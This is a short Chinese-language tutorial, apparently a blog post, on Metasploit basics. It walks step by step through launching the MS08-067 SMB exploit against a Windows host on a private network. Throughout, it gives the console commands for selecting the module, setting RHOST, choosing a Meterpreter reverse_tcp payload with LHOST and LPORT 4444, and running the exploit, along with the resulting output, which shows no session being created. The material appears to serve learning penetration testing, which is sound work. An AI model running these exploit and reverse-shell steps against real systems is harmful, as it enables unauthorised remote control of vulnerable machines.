metasploit(msf)基本知识补全

Kali下msfconsole启动metasploit 。
apt-get update 将软件更新到最新。
apt-get install metasploit-framework 安装到最新版本。
基本命令:
msf > show //查看所有可利用模块
msf > use exploit/windows/smb/ms08_067_netapi //使用一个漏洞利用模块
msf exploit(ms08_067_netapi) > show options //查看选项
Module options (exploit/windows/smb/ms08_067_netapi):
Name                Current Setting             Required        Description
----                      ---------------                   --------            -----------
RHOST                                                          yes                    The target address //目标IP
RPORT              445                                     yes                    The SMB service port
SMBPIPE          BROWSER                      yes                    The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
所以需要设置的只有RHOST。
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.197
RHOST => 192.168.43.197
接下来再次 msf exploit(ms08_067_netapi) > show options
RHOST的空白会被补全。
之后,使用一个payload。
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
接下来再次 msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name                Current Setting             Required        Description
----                      ---------------                   --------            -----------
RHOST                                                          yes                    The target address //目标IP
RPORT              445                                     yes                    The SMB service port
SMBPIPE          BROWSER                      yes                    The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.43.186 yes The listen address
LPORT 4444 yes The listen port

Exploit target:
Id Name
-- ----
0 Automatic Targeting
这里要区分RHOST和LHOST,分别是目标IP和本机IP。
LHOST为空白,设置本机IP。
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.186
LHOST空白处将会补全。
将RHOST,PAYLOAD,LHOST设置好之后。
msf exploit(ms08_067_netapi) > exploit //开启攻击
[*] Started reverse TCP handler on 192.168.43.186:4444
[*] Exploit completed, but no session was created.
攻击命令执行成功,但是没有回话被创建。